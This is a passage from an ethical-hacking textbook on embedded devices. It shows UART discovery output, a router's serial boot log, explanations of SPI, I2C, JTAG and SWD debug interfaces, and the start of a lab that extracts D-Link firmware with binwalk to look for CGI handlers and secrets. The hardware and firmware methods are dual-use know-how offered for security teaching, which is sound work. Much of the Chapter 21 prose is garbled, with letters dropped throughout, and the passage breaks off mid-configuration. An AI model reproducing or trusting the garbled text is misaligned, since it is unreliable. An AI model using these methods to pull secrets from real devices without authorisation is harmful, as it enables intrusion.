                       Data: ..^V....{......c [ C3 10 5E 56 FA E7 0E DB 7B CB BA C3 1B EF 89 63 ]

                       TXD: 0
                       RXD: 1
                       Baud: 19200
                       Data: ...N.....9._#.(. [ E4 19 80 4E 19 95 1D D8 1F 39 80 5F 23 C6 28 94 ]

                       TXD: 0
                       RXD: 1
                       Baud: 28800
                       Data: .L..gg..N...1..Y [ 1D 4C 0C 13 67 67 AD B9 4E 0C 0C 9F 31 D6 BD 59 ]

                       TXD: 0
                       RXD: 1
                       Baud: 31250
                       Data: ..?C.$...~0..3.. [ B3 13 3F 43 BD 24 B3 13 E3 7E 30 03 BD 33 B4 C3 ]

                       TXD: 0
                       RXD: 1
                       Baud: 38400
                       Data: .K..y...)A#.C(.r [ DE 4B F5 CB 79 D0 0B C4 29 41 23 2E 43 28 C3 72 ]

                       TXD: 0
                       RXD: 1
                       Baud: 57600
                       ➎Data: l-timers(q) sync [ 6C 2D 74 69 6D 65 72 73 28 71 29 20 73 79 6E 63 ]

                       TXD: 0
                       RXD: 1
                       Baud: 76800
                       Data: . [ 0C ]
                       --
                       UART scan complete.
                                                                           Chapter 20: Dissecting Embedded Devices
      ➏UART> p
      Note: UART pin naming is from the target's perspective.
      Enter X to disable either pin, if desired.
      Enter TXD pin [0]:
      Enter RXD pin [1]:
      ➐Enter baud rate [0]: 57600
      Enable local echo? [y/N]: y
      Entering UART passthrough! Press Ctrl-X to exit...

      Welcome to EdgeOS ubnt ttyS1

      By logging in, accessing, or using the Ubiquiti product, you
      acknowledge that you have read and understood the Ubiquiti
      License Agreement (available in the Web UI at, by default,
      http://192.168.1.1) and agree to be bound by its terms.

    If the test is successful, you should be able to interact with the serial console now.
Resetting the device with the serial console connected is typically very revealing. The text
is too long to include here, so I’ve provide snippets from the boot messages:

    • The processor is an MT-7621A (MIPS):
      ASIC MT7621A DualCore (MAC to MT7530 Mode)

    • It can be reprogrammed via U-Boot:
      Please choose the operation:

                                                                                                                     PART IV
         1: Load system code to SDRAM via TFTP.
         2: Load system code then write to Flash via TFTP.
         3: Boot system code via Flash (default).
         4: Enter boot command line interface.
         7: Load Boot Loader code then write to Flash via Serial.
         9: Load Boot Loader code then write to Flash via TFTP.
      default: 3

    • It is running Linux version 3.10.14-UBNT:
      Linux version 3.10.14-UBNT (root@edgeos-builder2) (gcc version 4.6.3 (Buildroot
      2012.11.1) ) #1 SMP Mon Nov 2 16:45:25 PST 2015

    • MTD partitions aid in understanding the storage layout:
      Creating 7 MTD partitions on "MT7621-NAND":
      0x000000000000-0x00000ff80000 : "ALL"
      0x000000000000-0x000000080000 : "Bootloader"
      0x000000080000-0x0000000e0000 : "Config"
      0x0000000e0000-0x000000140000 : "eeprom"
      0x000000140000-0x000000440000 : "Kernel"
      0x000000440000-0x000000740000 : "Kernel2"
      0x000000740000-0x00000ff00000 : "RootFS"
      [mtk_nand] probe successfully!

    Once the layout is determined, you can use a tool such as Bus Pirate to connect to the
pads and communicate with the embedded system. The main thing to remember is to
connect the TX on the device to the RX of your Bus Pirate and to connect the RX on the
device to the TX of your Bus Pirate.
    As with the JTAG interface, some may discount the severity of having enabled serial
ports on a device. However, with console access, an attacker can extract the configuration
and binaries, install tools, and look for global secrets that facilitate remote attacks against
all devices of this type.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              SPI
              Serial Peripheral Interface (SPI) is a full-duplex synchronous serial interface that is popu-
              lar in embedded systems. Unlike UART, SPI was designed to allow communications
              between two or more devices. SPI is a short-distance protocol that is used for commu-
              nications between ICs within an embedded system. The protocol uses a master/slave
              architecture and supports multiple slaves.4 In its simplest form, SPI requires four pins to
              communicate, which puts it on par with the UART example but with faster communica-
              tions (at the cost of distance). It is important to note that SPI is not standardized,5 and
              the datasheets will need to be consulted to determine the exact behavior of each device.
              The four pins are as follows:

                    • SCK Serial Clock
                    • MOSI Master Out Slave In
                    • MISO Master In Slave Out
                    • SS or CS Slave/Chip Select (output from master to address slave; active low)
                 For systems with a few slave devices, the master typically addresses each slave device
              using a dedicated chip select. Due to the additional chip selects, this requires more pins/
              traces and increases the cost of the system. For example, a system with three slave devices
              in this configuration requires six pins on the microcontroller (see Figure 20-3).
                 Another common configuration for multiple-slave devices is the daisy chain.4 The
              daisy chain configuration, shown in Figure 20-4, is typically used when the master
              does not need to receive data for applications such as LEDs or when there are many
              slave devices. Because the output of chip 1 is connected to the input of chip 2, and so
              on, there is a delay proportionate to the number of chips between the master and the
              intended recipient.
                 A common use of the SPI protocol is to access EEPROM (electrically erasable
              programmable read-only memory) and flash devices. By using Bus Pirate and flashrom
              (or something similar), you should be able to extract the contents of an EEPROM
              or flash device. The contents can then be analyzed to locate the file system and hunt
              for secrets.
                                                                                SPI
Figure 20-3                                  SCK             SCK
              SPI in a                                     MOSI            MOSI Slave 1
                                                  SPI      MISO            MISO
              three-chip                          Master   CS1             CS
              configuration                                CS2
              with individual                              CS3                  SPI
                                                                           SCK
              chip selects                                                 MOSI Slave 2
                                                                           MISO
                                                                           CS

                                                                                SPI
                                                                           SCK
                                                                           MOSI Slave 3
                                                                           MISO
                                                                           CS
                                                                         Chapter 20: Dissecting Embedded Devices
Figure 20-4                                SCK               SCK SPI
SPI in a                          SPI      MOSI              MOSI Slave 1
                                  Master   MISO              MISO
three-chip                                 SS                SS
configuration
using a daisy
                                                             SCK SPI
chain                                                        MOSI Slave 2
                                                             MISO
                                                             SS

                                                             SCK SPI
                                                             MOSI Slave 3
                                                             MISO
                                                             SS

I2C
Inter-Integrated-Circuit, pronounced I-squared-C and written as I2C,6 is a multimaster,
multislave, packetized serial communications protocol. It is slower than SPI but only uses
two pins instead of three, plus chip selects for each slave. Like SPI, I2C is used for short
distances between ICs on the board, but it can be used in cabling. Unlike SPI, I2C is an
official specification.

                                                                                                                   PART IV
   Although multiple masters are supported, they cannot communicate with each other
and cannot use the bus at the same time. To communicate with a specific device, the
master uses an address packet, followed by one or more data packets. The two pins are
as follows:

    • SCL Serial Clock
    • SDA Serial Data
  From Figure 20-5, you can see that the SDA pin is bidirectional and shared for all
devices. Additionally, the SCL pin is driven by the master that has acquired the data bus.
  Like SPI, I2C is commonly used to communicate with EEPROM or NVRAM
(nonvolatile random access memory). By using something like the Bus Pirate, you can
dump the contents for offline analysis or write new values.

Figure 20-5                   SPI          SCL               SCL       I2C
A two-master,                 Master 1     SDA               SDA       Slave 1
three-slave
sample                                                       SCL       I2C
configuration                                                SDA       Slave 2

                              SPI          SCL               SCL       I2C
                              Master 2     SDA               SDA       Slave 3
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Debug Interfaces
              Whereas debugging an application on a computer running Windows or Linux is rela-
              tively easy, by simply attaching to a process with a software debugger, embedded systems
              have many obstacles that make such a process a bit trickier. For example, how do you
              debug the embedded system when there is no operating system or the operating system is
              not booted? Modern embedded systems also have many complicated ICs on potentially
              densely populated boards with little to no access to the pins on the chips. Fortunately for
              the developers and testers, the hardware manufacturing industry developed methods for
              accessing IC internals for testing, debugging, and writing firmware to nonvolatile stor-
              age, and many other uses.

              JTAG
              The Joint Test Action Group (JTAG) was created in the 1980s as a method to facilitate
              debugging and testing ICs. In 1990, the method was standardized as IEEE 1149.1, but
              it is commonly referred to as simply JTAG.7 Although it was initially created to help with
              board-level testing, the capabilities allow debugging at the hardware level.
                  Although this is an oversimplification, JTAG defines a mechanism of utilizing a few
              externally accessible signals to access IC internals via a standardized state-machine. The
              mechanism is standardized, but the actual functionality behind it is IC specific. This
              means that you must know the IC being debugged to use JTAG effectively. For example,
              a bit sequence to an ARM processor and an MIPS processor will be interpreted differ-
              ently by the internal logic of the processor. Tools such as OpenOCD require device-
              specific config files to operate properly. Although manufacturers may define more pins,
              the four/five JTAG pin description is provided in Table 20-2. The collection of pins is
              also known as the test access port (TAP).
                  Although you might think that five pins would have a standard layout, board and
              IC manufacturers define their own layouts. Some common pinouts are defined in
              Table 20-3 and include 10-, 14-, and 20-pin configurations. The pinouts in the table
              are only a sampling and need to be verified before they are used with a debugger.

                Pin                               Description
                TCK (Test Clock)                  The Test Clock pin is used to clock data into the TDI and TMS inputs
                                                  of the target. The clock provides a means for the debugger and
                                                  device to be synchronized.
                TMS (Test Mode Select)            The Test Mode Select pin is used to set the state of the Test Access
                                                  Port (TAP) controller on the target.
                TDI (Test Data In)                The Test Data In pin provides serial data to the target during
                                                  debugging.
                TDO (Test Data Out)               The Test Data Out pin receives serial data from the target during
                                                  debugging.
                TRST (Test Reset)                 (Optional) The Test Reset pin can be used to reset the TAP controller
                                                  of the processor to allow debugging to take place.
Table 20-2 Four/Five Pin JTAG Interface Description
                                                                          Chapter 20: Dissecting Embedded Devices
      Pin        14-Pin ARM           20-Pin ARM       TI MSP430           MIPS EJTAG
      1          VRef                 VRef             TDO                 nTRST
      2          GND                  VSupply          VREF                GND
      3          nTRST                nTRST            TDI                 TDI
      4          GND                  GND              —                   GND
      5          TDI                  TDI              TMS                 TDO
      6          GND                  GND              TCLK                GND
      7          TMS                  TMS              TCK                 TMS
      8          GND                  GND              VPP                 GND
      9          TCK                  TCK              GND                 TCK
     10          GND                  GND              —                   GND
     11          TDO                  RTCK             nSRST               nSRST
     12          nSRST                GND              —                   —
     13          VREF                 TDO              —                   DINT
     14          GND                  GND              —                   VREF
     15                               nSRST

                                                                                                                    PART IV
     16                               GND
     17                               DBGRQ
     18                               GND
     19                               DBGAK
     20                               GND
Table 20-3 Typical JTAG Pinouts8, 9

   For the developer and tester, the following capabilities are commonly used:

    • Halting the processor while debugging
    • Reading and writing the internal program store (when code is stored inside the
      microcontroller)
    • Reading and writing flash (firmware modification or extraction)
    • Reading and writing memory
    • Modifying the program flow to bypass functionality to gain restricted access
   As you can see, the functionality available to the JTAG interface is quite powerful.
Equipment manufacturers are in a quandary. To develop, test, and debug the embedded
system throughout its life cycle, the JTAG port is indispensable; however, its existence on
the board provides researchers and attackers the ability to discover secrets, alter behavior,
and find vulnerabilities. Manufacturers will typically attempt to make it more difficult to
use the JTAG interface after production by severing the lines, not populating the pins,
Gray Hat Hacking: The Ethical Hacker’s Handbook
              not labeling the pinout, or using chip capabilities to disable it. Although this is reason-
              ably effective, a determined attacker has many means in their arsenal to circumvent the
              protections, including fixing broken traces, soldering pins on the board, or possibly even
              shipping an IC to a company that specializes in extracting data.
                 Some may dismiss JTAG as a weakness since physical, possibly destructive, access is
              required to use it. The problem with dismissing the attack is that the attacker can learn a
              great deal about the system using JTAG. If a global secret such as a password, an inten-
              tional backdoor for support, a key, or a certificate is present on the system, it may be
              extracted and subsequently used to attack a remote system.

              SWD
              Serial Wire Debug (SWD) is an ARM-specific protocol for debugging and program-
              ming. Unlike the more common five-pin JTAG, SWD uses two pins. SWD provides a
              clock (SWDCLK) and bidirectional data line (SWDIO) to deliver the debug function-
              ality of JTAG. As can be seen in Table 20-4, SWD and JTAG can coexist,10 which is
              important to note.

                      Pin            10-Pin ARM Cortex SWD and JTAG11   20-Pin ARM SWD and JTAG12
                       1             VRef                               VRef
                       2             SWDIO / TMS                        VSupply
                       3             GND                                nTRST
                       4             SWDCLK / TCK                       GND
                       5             GND                                TDI / NC
                       6             SWO / TDO                          GND
                       7             KEY                                TMS / SWDIO
                       8             TDI / NC                           GND
                       9             GNDDetect                          TCK / SWDCLK
                     10              nRESET                             GND
                     11                                                 RTCK
                     12                                                 GND
                     13                                                 TDO / SWO
                     14                                                 GND
                     15                                                 nSRST
                     16                                                 GND
                     17                                                 DBGRQ
                     18                                                 GND
                     19                                                 DBGAK
                     20                                                 GND
Table 20-4 Typical JTAG/SWD Pinouts
                                                                        Chapter 20: Dissecting Embedded Devices
   The capabilities for developers and testers are the same as those mentioned for JTAG.
As with JTAG, the capabilities that help manufacturers also enable attackers to discover
vulnerabilities.

Software
All the hardware we’ve discussed so far would be useless without something defining
its functionality. In microcontroller/microprocessor-based systems, software defines the
capabilities and breathes life into the system. A bootloader is used to initialize the pro-
cessor and start the system software. The system software for these systems typically falls
into one of these three scenarios:

   • No operating system For simple systems
   • Real-time operating system For systems with rigid processing time
     requirements (for example, VxWorks and Nucleus)
   • General operating system For systems that typically don’t have hard time
     constraints and have many functional requirements (for example, Linux and
     Embedded Windows)

                                                                                                                  PART IV
Bootloader
For higher-level software to run on a processor, the system must be initialized. The soft-
ware that performs the initial configuration of the processor and the required initial
peripheral devices is called the bootloader. The process typically requires multiple stages
to get the system ready to run the higher-level software. The oversimplified process is
generally described as follows:

   1. The microprocessor/microcontroller loads a small program from a fixed location
      of an off-processor device based on the boot mode.
   2. The small program initializes RAM and structures required to load the remainder
      of the bootloader in RAM (U-Boot, for example).
   3. The bootloader initializes any devices necessary to start the main program or OS,
      loads the main program, and transfers execution to the newly loaded program.
      For Linux, the main program would be the kernel.
   If U-Boot is used, this bootloader may have been configured to allow alternative
means of loading the main program. For example, U-Boot is capable of loading from
an SD card, NAND or NOR flash, USB, a serial interface, or TFTP over the network
if networking is initialized. In addition to loading the main program, it can be used to
replace the main program in a persistent storage device. The Ubiquiti ER-X, from our
earlier example of using the JTAGulator, uses U-Boot (see Figure 20-6). In addition to
loading the kernel, it allows reading and writing memory and storage.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Figure 20-6
              U-Boot from
              Ubiquiti ER-X

              No Operating System
              For many applications, the overhead of an OS and the simplicity of the system do not
              justify or allow for an OS. For example, a sensor that performs measurements and sends
              them to another device likely uses a low-power microcontroller such as a PIC and has
              very little need for an operating system. In this example, the PIC likely does not have
              enough resources (storage, RAM, and so on) to allow it to run an OS.
                 In systems with no OS, the data storage will likely be very crude, based on address off-
              sets or using NVRAM. Additionally, these systems typically do not have a user interface,
              or the interface is extremely simple, such as LEDs and buttons. After the program has
              been acquired, either from extraction from storage or via downloading, the format can be
              entirely custom and not easily identifiable to frequently used file analysis tools. The best
              bet is to read the documentation for the microcontroller to understand how the device
              loads code and attempts to deconstruct it manually with a disassembler.
                 You might be thinking that a system this simple would not be very interesting, but
              keep in mind that it might have connectivity to a more complex system with Internet
              connections. Don’t dismiss these devices as not having a valuable attack surface with-
              out first considering the total use case, including connected devices and their purpose.
                                                                           Chapter 20: Dissecting Embedded Devices
The limited instruction space might mean that the device doesn’t have the ability to
adequately protect itself from malicious input, and the protocols are likely not encrypted.
Additionally, connected systems might explicitly trust any data coming from these devices
and therefore not take appropriate measures to ensure that the data is valid.

Real-Time Operating System
Systems that are more complex and have hard time-processing requirements will typi-
cally use a real-time operating system (RTOS) such as VxWorks. The advantage of the
RTOS is that it provides the functionality of an OS, such as tasks, queues, networking
stacks, file systems, interrupt handler, and device management, with the added capabil-
ity of a deterministic scheduler. For example, autonomous or driver-assisted automotive
systems likely use an RTOS to ensure that reactions to various sensors are happening
within the safety tolerance of the system (rigid).
   For those used to systems running Linux, VxWorks is much different. Linux has a
fairly standard file system with common programs such as telnet, BusyBox, ftp, and sh,
and applications run as separate processes on the OS. With VxWorks, many of the sys-
tems run with effectively a single process, with multiple tasks and no standard file system
or secondary applications. Whereas Linux has a lot of information regarding extraction
of firmware and reverse engineering, there is very little information regarding VxWorks.

                                                                                                                     PART IV
   Extracting the firmware with SPI or I 2C or using a downloaded file will provide you
with strings and code that can be disassembled. But unlike with Linux, you will not gen-
erally get easily digestible data. Analyzing the strings for passwords, certificates, keys, and
format strings can yield useful secrets to use against the live system. Additionally, using
JTAG to set breakpoints and perform actions on the device is likely the most effective
method of reversing the functionality.

General Operating System
The term general operating system is being used to describe non-RTOS operating systems.
Linux is the most common example of a general operating system. Linux for embedded
systems is not much different from Linux for a desktop system. The file systems and
architecture are the same. The main differences between embedded and desktop versions
are peripherals, storage, and memory constraints.
   To accommodate the generally smaller storage and memory, the OS and file system are
minimized. For example, instead of using the common programs installed with Linux,
such as bash, telnetd, ls, cp, and such, a smaller monolithic program called BusyBox is
typically used. BusyBox13 provides the functionality within a single executable by using
the first argument as the desired program. Although I’d like to say that unused services
are removed to reduce the attack surface, they are likely only removed to save space.
   Although most devices do not intentionally provide console access to the user, many
do have a serial port for console access on the board. As soon as you have access to the
root file system, either via the console or by extracting the image from storage, you will
want to look for the versions of applications and libraries, world-writable directories,
any persistent storage, and the initialization process. The initialization process for Linux,
found in /etc/inittab and /etc/init.d/rcS, will give you an idea of how the applications are
started on boot.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Summary
              In this chapter, we briefly discussed the differences between different CPU packages
              (microcontroller, microprocessor, and SoC), several serial interfaces of interest, JTAG,
              and embedded software. In our discussion of serial interfaces, you were introduced to
              the JTAGulator in an example of discovering UART (serial) ports. JTAGulator can also
              be used to discover JTAG debug ports and potentially several other interfaces. We also
              briefly discussed different software use cases, including bootloaders, no OS, an RTOS,
              and a general OS. At this point, you should have a common vocabulary for embedded
              systems and a few areas of concern when attempting to gain a further understanding.

              For Further Reading
              ARM developer.arm.com/products/architecture/a-profile, developer.arm.com/products/
              architecture/r-profile, developer.arm.com/products/architecture/m-profile, www.arm.com/
              products/silicon-ip-cpu
              Bus Pirate dangerousprototypes.com/docs/Bus_Pirate
              Embedded Linux www.elinux.org/Main_Page
              Firmware extraction and reconstruction www.j-michel.org/blog/2013/09/16/firmware-
              extraction-and-reconstruction
              Free RTOS www.freertos.org/
              I2C learn.sparkfun.com/tutorials/i2c
              JTAG wrongbaud.github.io/posts/jtag-hdd/, developer.arm.com/docs/dui0499/latest/
              arm-dstream-target-interface-connections/signal-descriptions/serial-wire-debug
              JTAGulator www.grandideastudio.com/jtagulator/
              MT-7621A www.mediatek.com/products/homeNetworking/mt7621n-a, wikidevi.wi-cat
              .ru/Ubiquiti_Networks_EdgeRouter_X_(ER-X)
              OpenOCD openocd.org/
              Reverse-engineering        VxWorks      firmware www.devttys0.com/2011/07/reverse-
              engineering-vxworks-firmware-wrt54gv8/
              SPI www.maximintegrated.com/en/app-notes/index.mvp/id/3947
              Understanding ARM HW debug options elinux.org/images/7/7f/Manderson5.pdf
              VxWorks www.windriver.com/products/vxworks/
                                                                      Chapter 20: Dissecting Embedded Devices
References
  1. “OR gate,” Wikipedia, https://en.wikipedia.org/wiki/OR_gate.
  2. “ARM Architecture Profiles,” ARM Developer, http://infocenter.arm.com/help/
     index.jsp?topic=/com.arm.doc.dui0471i/BCFDFFGA.html.
  3. Jim Turley, “Wait, What? MIPS Becomes RISCV,” EE Journal, March 8, 2021,
     https://www.eejournal.com/article/wait-what-mips-becomes-risc-v/.
  4. “Serial Peripheral Interface (SPI),” Sparkfun, https://learn.sparkfun.com/tutorials/
     serial-peripheral-interface-spi.
  5. “Serial Peripheral Interface, Standards,” Wikipedia, https://en.wikipedia.org/wiki/
     Serial_Peripheral_Interface#Standards.
  6. “I2C—What’s That?,” I2C, https://www.i2c-bus.org/.
  7. “Joint Test Action Group,” Wikipedia, https://en.wikipedia.org/wiki/JTAG.
  8. “JTAG Pinouts,” JTAG Test, www.jtagtest.com/pinouts/.
  9. “JTAG Pin Descriptions,” ARM DS-5 ARM DSTREAM System and Interface
     Design Reference Guide, Version 5, https://developer.arm.com/docs/dui0499/latest/
     arm-dstream-target-interface-connections/the-arm-jtag-20-connector-pinouts-

                                                                                                                PART IV
     and-interface-signals/arm-jtag-20-interface-signals.
 10. “Structure of the SWJ-DP” (JTAG/SWD Coexist as SWJ-DP), ARM Developer,
     http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0314h/
     Chdjjbcb.html.
 11. “10-Way Connector Pinouts” (SWD/JTAG 10 Pin), ARM Developer, http://
     infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0314h/Chdhbiad.html.
 12. “20-Way Connector Pinouts Including Trace” (SWD/JTAG 20 Pin), ARM
     Developer, http://infocenter.arm.com/help/topic/com.arm.doc.ddi0314h/
     Chdfccbi.html.
 13. “BusyBox: The Swiss Army Knife of Embedded Linux,” BusyBox, https://busybox
     .net/about.html.
This page intentionally left blank
  Exploiting
  Embedded Devices
                                                                             CHAPTER

                                                                                         21
  In this chapter, we cover the following topics:
      • Static analysis of vulnerabilities in embedded devices
      • Dynamic analysis with hardware
      • Dynamic analysis with emulation

T ape ove expong embedded deve. T op  beomng neangy
mpoan w e emegene o e Inene o Tng (IoT), a oveed n pevou
ape. Fom eevao o a, oae, and eveyng “ma,” embedded deve
ae beomng ubquou, and e euy vuneabe and ea ae beomng
nnumeabe. A Bue Snee a obeved,   ke e Wd We o e 1990
a ove agan; eveywee we ook, ee ae vuneabe n ee embedded deve.
Snee expan a   beaue o many ao, nudng e med eoue o
e deve emeve and e med eoue o e manuaue n e ow-magn
ed o podung embedded deve.1 Hopeuy, moe ea ake w e o mee
 aenge and make a den n e de o vuneabe o embedded deve.

Static Analysis of Vulnerabilities
in Embedded Devices
Sa anay o vuneabe nvove ookng o vuneabe by npeng e
updae pakage, e yem, and bnae o e yem wou avng o powe up
e deve beng evauaed. In a, n mo ae, e aake doen’ need o ave e
deve o do mo o e a anay. In  eon, you ae expoed o ome oo and
enque o ondung a anay on an embedded deve.

Lab 21-1: Analyzing the Update Package

In mo ae, e updae pakage o a deve an be downoaded om e vendo e.
Cueny, many,  no mo, updae ae no enyped and eeoe an poenay
be deonued w vaou oo u a unzp, bnwak, and Fmwae Mod K.

Gray Hat Hacking: The Ethical Hacker’s Handbook
              Fo nuon pupoe, we w ook a a Lnux-baed yem ne you ae mo key
              ama w ee yem.
                 In Lnux-baed embedded yem, e updae pakage oen onan a new opy
              o a e eena e and deoe equed o opeae e yem. Te equed
              deoe and e ae eeed o a e root file system (RFS). I an aake an gan
              ae o e RFS, ey w ave e nazaon oune, web eve oue ode, any
              bnae equed o un e yem, and poby ome bnae a povde e aake
              w an advanage wen aempng o expo e yem. Fo exampe,  a yem ue
              BuyBox and nude e ened eve, an aake mg be abe o eveage e Tene
              eve o povde emoe ae o e yem. Speay, e ened eve nuded n
              BuyBox povde an agumen a aow  o be nvoked wou auenaon and
              o bnd o any pogam (/u/bn/ened – /bn/).
                 A an exampe, we w nvegae an ode veon o e D-Lnk DAP-1320 wee
              ange exende’ mwae updae (veon 1.1 o e A adwae). T updae wa oen
              beaue   an ode updae a a been paed, and e vuneaby doue
              (www.kb.e.og/vu/d/184100) wa epoed by evea o e auo.

                 Te  ep  o eae e envonmen o deonung e mwae. In ou ae,
              we w ue bnwak. Te bae o yem o ou anay  Ka Lnux 2021.1. In ode
              o na bnwak, we mu  na e peeque ung e pakage manage ap-
              ge o na pp3 and emove e naed veon o bnwak ➊. One e peeque
              ae me, e na eque onng e poje om GHub, ekng ou a pe
              known-wokng veon, modyng e dep. p o oe eo eaed o Ka,
              unnng e dep. p ➋, and nang bnwak. We en aemp o exa e
              mwae ➌ povded n Lab 21-1 on e book’ GHub epooy, and  e pakage
              and onen ype ae known by e oo, ey w be exaed o ue anay. Fom
              e oupu, we an ee a e oo a ound bo an MIPS Lnux kene mage ➍ and
                                                                       Chapter 21: Exploiting Embedded Devices
a qua e yem ➎ ➏. By bowng e exaon, we deny  o be e oo ➐
and vey a e bnae ae omped o MIPS ➑.
➊$ sudo apt install python3-pip
<truncated for brevity>
$ sudo apt-get --purge remove binwalk

➋$ git clone https://github.com/ReFirmLabs/binwalk.git
<truncated for brevity>
$ cd binwalk
➋$ git checkout 772f271
<truncated for brevity>
➋$ sed -i "s#qt5base-dev#qtbase5-dev#" deps.sh
$ sed -i "s#\$SUDO \./build\.sh#CFLAGS=-fcommon \$SUDO \./build\.sh#" deps.sh
$ ./deps.sh
<truncated for brevity>
$ sudo python3 setup.py install
<truncated for brevity>
$ cd ~

➌$ binwalk -Me DAP-1320_FIRMWARE_1.11B10.zip
Scan Time:     2021-09-06 12:05:16
Target File:   /home/grayhat/DAP-1320_FIRMWARE_1.11B10.zip
MD5 Checksum: ebd3a01c9e2079de403cf336741e1870
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION

                                                                                                                 PART IV
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract,
compressed size: 3576647, uncompressed size: 5439486,
name: DAP1320_fw_1_11b10.bin
3576803       0x3693E3        End of Zip archive, footer length: 22

Scan Time:     2021-09-06 12:05:16
Target File:   /home/grayhat/_DAP-
1320_FIRMWARE_1.11B10.zip.extracted/DAP1320_fw_1_11b10.bin
MD5 Checksum: 3d13558425d1147654e8801a99605ce6
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             uImage header, header size: 64 bytes, header CRC:
0x71C7BA94, created: 2013-09-16 08:50:53, image size: 799894 bytes, Data Address:
0x80002000, Entry Point: 0x801AB9F0, data CRC: 0xA62B902, ➍OS: Linux, CPU: MIPS,
image type: OS Kernel Image, compression type: lzma, image name: "Linux Kernel
Image"
64            0x40            LZMA compressed data, properties: 0x5D, dictionary
size: 8388608 bytes, uncompressed size: 2303956 bytes
851968        0xD0000         ➎Squashfs filesystem, little endian, version 4.0,
compression:lzma, size: 2774325 bytes, 589 inodes, blocksize: 65536 bytes,
created: 2013-09-16 08:51:15

Scan Time:     2021-09-06 12:05:18
Target File:   /home/grayhat/_DAP-1320_FIRMWARE_1.11B10.zip.extracted/_DAP1320_
fw_1_11b10.bin.extracted/40
MD5 Checksum: a741e8176a2f160957382396824e2620
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
78808         0x133D8         Certificate in DER format (x509 v3), header length:
4, sequence length: 30
79160         0x13538         Certificate in DER format (x509 v3), header length:
4, sequence length: 30
Gray Hat Hacking: The Ethical Hacker’s Handbook
              79604         0x136F4         Certificate in DER format (x509 v3), header length:
              4, sequence length: 30
              1769504       0x1B0020        Linux kernel version 2.6.31
              1790640       0x1B52B0        CRC32 polynomial table, little endian
              2009280       0x1EA8C0        Neighborly text, "NeighborSolicitstunnel6 init():
              can't add protocol"
              2009300       0x1EA8D4        Neighborly text, "NeighborAdvertisementst add
              protocol"
              2011043       0x1EAFA3        Neighborly text, "neighbor
              %.2x%.2x.%.2x:%.2x:%.2x:%.2x:%.2x:%.2x lost on port %d(%s)(%s)"

              ➏$ ls _DAP-1320_FIRMWARE_1.11B10.zip.extracted/\
              _DAP1320_fw_1_11b10.bin.extracted
              40 40.7z D0000.squashfs squashfs-root

              ➐$ ls _DAP-1320_FIRMWARE_1.11B10.zip.extracted/\
              _DAP1320_fw_1_11b10.bin.extracted/squashfs-root
              bin dev etc lib linuxrc proc sbin share sys                    tmp   usr   var   www

              $ cd _DAP-1320_FIRMWARE_1.11B10.zip.extracted/\
              _DAP1320_fw_1_11b10.bin.extracted/squashfs-root/
              $ ls -m bin
              ash, busybox, busybox_161, cat, cgi, chmod, cli, cp, date, dd, echo, egrep,
              ethreg, fgrep, gpio_event, grep, hostname, kill, ln, login, ls, md, mkdir, mm,
              mount, mv, netbios_checker, nvram, ping, ping6, ps, rm, sed, sh, sleep, ssi,
              touch, udhcpc, umount, uname, xmlwf
              ➑$ file bin/busybox
              bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV),
              dynamically linked, interpreter /lib/ld-uClibc.so.0, no section header

                 Now a e updae pakage a been exaed,   me o bowe e e, ookng
              o eaue, onguaon, o unknown appaon. Tabe 21-1 dene ome em o
              ook o we bowng.

                                 NOTE Each version of an executable or library that is found needs to be
                                 cross-checked against known vulnerabilities. For example, use a Google
                                 search of <name> <version number> vulnerability.

                Purpose                           Bash Command Examples
                Locate executable files           find . -type f -perm /u+x
                (note: non-BusyBox files).
                Determine the directory           find . –type d
                structure for future analysis.
                Find web servers or               find . -type f -perm /u+x -name "*httpd*" -o
                associated technologies.          -name "*cgi*" -o -name "*nginx*"
                Find library versions.            for i in `find . -type d -name lib`;do find
                                                  $i -type f;done
                Find HTML, JavaScript,            find . –name "*.htm*" –o –name "*.js" –o –
                CGI, and config files.            name "*.cgi" –o –name "*.conf"
                Look for an executable            strings sbin/lighttpd | grep lighttpd
                version (for example,
                with lighttpd).
Table 21-1 Examples of Interrogating the File System
                                                                                   Chapter 21: Exploiting Embedded Devices
    One you’ve oeed a  nomaon, you w wan o undeand wa 
poeng eque om e bowe o any eve unnng. Beaue we’ve aeady
peomed a e peedng ep, we edued e oowng exampe n ode o make e
anay moe ondened and agowad. Te web eve wa ound o be gpd
➊, w ue gpd*.on ➋ and modue.on ➌ o e onguaon. Fuemoe,
 ue g.on ➍, w pon amo a andng o /bn/ ➎ (a bnay exeuabe).
$ find . -type f -perm /u+x -name "*httpd*" -o \
-name "*cgi*" -o -name "*nginx*"
<truncated for brevity>
➊./sbin/lighttpd
./sbin/lighttpd-angel
./etc/conf.d/cgi.conf
./bin/cgi
$ find . -name *.conf
➋./etc/lighttpd.conf
./etc/conf.d/mime.conf
./etc/conf.d/cgi.conf
./etc/conf.d/auth_base.conf
./etc/conf.d/expire.conf
./etc/conf.d/auth.conf
./etc/conf.d/dirlisting.conf
./etc/conf.d/graph_auth.conf
./etc/conf.d/access_log.conf
./etc/modules.conf

                                                                                                                             PART IV
./etc/host.conf
./etc/resolv.conf
➋./etc/lighttpd_base.conf
$ cat etc/lighttpd_base.conf
#######################################################################
## /etc/lighttpd/lighttpd.conf
## check /etc/lighttpd/conf.d/*.conf for the configuration of modules.
#######################################################################
<truncated>
## Load the modules.
➌include "modules.conf"
<truncated>
$ cat etc/modules.conf
#######################################################################
# # Mo d u l e s t o l o a d
<truncated>
➍include "conf.d/cgi.conf"
root@kali:~/DAP-1320/fmk/rootfs# cat etc/conf.d/cgi.conf
#######################################################################
# # CGI mo d u l e s
## ---------------
## http://www.lighttpd.net/documentation/cgi.html
##
server.modules += ( "mod_cgi" )

## Plain old CGI handling
## For PHP don't forget to set cgi.fix_pathinfo = 1 in the php.ini.
##
cgi . as s i gn                 = (
➎                                            " . h t m" = > " / b i n / s s i " ,
